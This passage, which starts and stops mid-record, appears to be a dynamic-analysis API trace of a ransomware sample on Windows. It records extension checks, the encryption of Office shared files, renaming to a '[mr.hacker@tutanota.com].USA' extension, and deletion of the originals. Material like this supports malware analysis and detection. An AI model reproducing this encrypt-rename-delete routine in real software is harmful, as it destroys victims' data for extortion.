-1 [0035.182] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.182] lstrlenW (lpString=".dbf") returned 4 [0035.182] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.182] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.182] lstrlenW (lpString=".1cd") returned 4 [0035.182] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.182] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.182] lstrlenW (lpString=".jpg") returned 4 [0035.182] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.182] lstrcmpiW (lpString1=".EPS", lpString2=".USA") returned -1 [0035.182] lstrlenW (lpString="MS.EPS") returned 6 [0035.182] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.184] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=15067) returned 1 [0035.184] CloseHandle (hObject=0x1b0) returned 1 [0035.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 0x20 [0035.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.184] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.184] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.184] GetLastError () returned 0x0 [0035.184] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x3adb, lpOverlapped=0x0) returned 1 [0035.371] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x3ae0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x3ae0, lpOverlapped=0x0) returned 1 [0035.373] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0035.373] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe0, lpOverlapped=0x0) returned 1 [0035.373] SetEndOfFile (hFile=0x1b4) returned 1 [0035.373] CloseHandle (hObject=0x1b4) returned 1 [0035.374] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.374] SetEndOfFile (hFile=0x1b0) returned 1 [0035.375] CloseHandle (hObject=0x1b0) returned 1 [0035.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0035.375] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 1 [0035.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.375] lstrlenW (lpString=".doc") returned 4 [0035.375] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0035.375] lstrlenW (lpString=".docx") returned 5 [0035.375] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0035.375] lstrlenW (lpString=".pdf") returned 4 [0035.375] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0035.375] lstrlenW (lpString=".xls") returned 4 [0035.375] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0035.375] lstrlenW (lpString=".xlsx") returned 5 [0035.376] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0035.376] lstrlenW (lpString=".ppt") returned 4 [0035.376] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0035.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.376] lstrlenW (lpString=".zip") returned 4 [0035.376] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0035.376] lstrlenW (lpString=".rar") returned 4 [0035.376] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0035.376] lstrlenW (lpString=".bz2") returned 4 [0035.376] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0035.376] lstrlenW (lpString=".7z") returned 3 [0035.376] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0035.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.376] lstrlenW (lpString=".dbf") returned 4 [0035.376] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0035.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.376] lstrlenW (lpString=".1cd") returned 4 [0035.376] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0035.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.376] lstrlenW (lpString=".jpg") returned 4 [0035.376] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0035.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.376] lstrlenW (lpString=".doc") returned 4 [0035.376] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0035.376] lstrlenW (lpString=".docx") returned 5 [0035.376] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0035.376] lstrlenW (lpString=".pdf") returned 4 [0035.376] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0035.376] lstrlenW (lpString=".xls") returned 4 [0035.376] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0035.377] lstrlenW (lpString=".xlsx") returned 5 [0035.377] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0035.377] lstrlenW (lpString=".ppt") returned 4 [0035.377] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0035.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.377] lstrlenW (lpString=".zip") returned 4 [0035.377] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0035.377] lstrlenW (lpString=".rar") returned 4 [0035.377] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0035.377] lstrlenW (lpString=".bz2") returned 4 [0035.377] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0035.377] lstrlenW (lpString=".7z") returned 3 [0035.377] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0035.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.377] lstrlenW (lpString=".dbf") returned 4 [0035.377] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0035.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.377] lstrlenW (lpString=".1cd") returned 4 [0035.377] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0035.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0035.377] lstrlenW (lpString=".jpg") returned 4 [0035.377] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0035.377] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.377] lstrlenW (lpString="boxed-delete.avi") returned 16 [0035.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.902] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=31744) returned 1 [0035.902] CloseHandle (hObject=0x17c) returned 1 [0035.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0035.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.902] lstrlenW (lpString=".doc") returned 4 [0035.902] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.902] lstrlenW (lpString=".docx") returned 5 [0035.902] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0035.902] lstrlenW (lpString=".pdf") returned 4 [0035.902] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.902] lstrlenW (lpString=".xls") returned 4 [0035.902] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.902] lstrlenW (lpString=".xlsx") returned 5 [0035.902] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0035.902] lstrlenW (lpString=".ppt") returned 4 [0035.902] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.902] lstrlenW (lpString=".zip") returned 4 [0035.902] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.902] lstrlenW (lpString=".rar") returned 4 [0035.903] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString=".bz2") returned 4 [0035.903] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString=".7z") returned 3 [0035.903] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.903] lstrlenW (lpString=".dbf") returned 4 [0035.903] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.903] lstrlenW (lpString=".1cd") returned 4 [0035.903] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.903] lstrlenW (lpString=".jpg") returned 4 [0035.903] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.903] lstrlenW (lpString=".doc") returned 4 [0035.903] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString=".docx") returned 5 [0035.903] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0035.903] lstrlenW (lpString=".pdf") returned 4 [0035.903] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString=".xls") returned 4 [0035.903] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString=".xlsx") returned 5 [0035.903] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0035.903] lstrlenW (lpString=".ppt") returned 4 [0035.903] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.903] lstrlenW (lpString=".zip") returned 4 [0035.903] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.903] lstrlenW (lpString=".rar") returned 4 [0035.904] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.904] lstrlenW (lpString=".bz2") returned 4 [0035.904] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.904] lstrlenW (lpString=".7z") returned 3 [0035.904] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.904] lstrlenW (lpString=".dbf") returned 4 [0035.904] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.904] lstrlenW (lpString=".1cd") returned 4 [0035.904] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0035.904] lstrlenW (lpString=".jpg") returned 4 [0035.904] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.904] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.904] lstrlenW (lpString="correct.avi") returned 11 [0035.904] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.904] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=197120) returned 1 [0035.904] CloseHandle (hObject=0x17c) returned 1 [0035.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0035.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.905] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.905] lstrlenW (lpString=".doc") returned 4 [0035.905] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.905] lstrlenW (lpString=".docx") returned 5 [0035.905] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0035.905] lstrlenW (lpString=".pdf") returned 4 [0035.905] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.905] lstrlenW (lpString=".xls") returned 4 [0035.905] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.905] lstrlenW (lpString=".xlsx") returned 5 [0035.905] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0035.905] lstrlenW (lpString=".ppt") returned 4 [0035.905] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.905] lstrlenW (lpString=".zip") returned 4 [0035.905] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.905] lstrlenW (lpString=".rar") returned 4 [0035.905] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.905] lstrlenW (lpString=".bz2") returned 4 [0035.905] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.905] lstrlenW (lpString=".7z") returned 3 [0035.905] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.906] lstrlenW (lpString=".dbf") returned 4 [0035.906] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.906] lstrlenW (lpString=".1cd") returned 4 [0035.906] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.906] lstrlenW (lpString=".jpg") returned 4 [0035.906] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.906] lstrlenW (lpString=".doc") returned 4 [0035.906] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString=".docx") returned 5 [0035.906] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0035.906] lstrlenW (lpString=".pdf") returned 4 [0035.906] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString=".xls") returned 4 [0035.906] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString=".xlsx") returned 5 [0035.906] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0035.906] lstrlenW (lpString=".ppt") returned 4 [0035.906] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.906] lstrlenW (lpString=".zip") returned 4 [0035.906] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString=".rar") returned 4 [0035.906] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString=".bz2") returned 4 [0035.906] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.906] lstrlenW (lpString=".7z") returned 3 [0035.906] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.907] lstrlenW (lpString=".dbf") returned 4 [0035.907] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.907] lstrlenW (lpString=".1cd") returned 4 [0035.907] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0035.907] lstrlenW (lpString=".jpg") returned 4 [0035.907] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.907] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.907] lstrlenW (lpString="delete.avi") returned 10 [0035.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0036.315] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=224256) returned 1 [0036.315] CloseHandle (hObject=0x160) returned 1 [0036.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0036.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.316] lstrlenW (lpString=".doc") returned 4 [0036.316] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.316] lstrlenW (lpString=".docx") returned 5 [0036.316] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0036.316] lstrlenW (lpString=".pdf") returned 4 [0036.316] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.316] lstrlenW (lpString=".xls") returned 4 [0036.316] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.316] lstrlenW (lpString=".xlsx") returned 5 [0036.316] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0036.316] lstrlenW (lpString=".ppt") returned 4 [0036.316] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.317] lstrlenW (lpString=".zip") returned 4 [0036.317] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString=".rar") returned 4 [0036.317] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString=".bz2") returned 4 [0036.317] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString=".7z") returned 3 [0036.317] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.317] lstrlenW (lpString=".dbf") returned 4 [0036.317] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.317] lstrlenW (lpString=".1cd") returned 4 [0036.317] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.317] lstrlenW (lpString=".jpg") returned 4 [0036.317] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.317] lstrlenW (lpString=".doc") returned 4 [0036.317] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString=".docx") returned 5 [0036.317] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0036.317] lstrlenW (lpString=".pdf") returned 4 [0036.317] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString=".xls") returned 4 [0036.317] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.317] lstrlenW (lpString=".xlsx") returned 5 [0036.317] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0036.318] lstrlenW (lpString=".ppt") returned 4 [0036.318] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.318] lstrlenW (lpString=".zip") returned 4 [0036.318] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.318] lstrlenW (lpString=".rar") returned 4 [0036.318] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.318] lstrlenW (lpString=".bz2") returned 4 [0036.318] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.318] lstrlenW (lpString=".7z") returned 3 [0036.318] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.318] lstrlenW (lpString=".dbf") returned 4 [0036.318] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.318] lstrlenW (lpString=".1cd") returned 4 [0036.318] 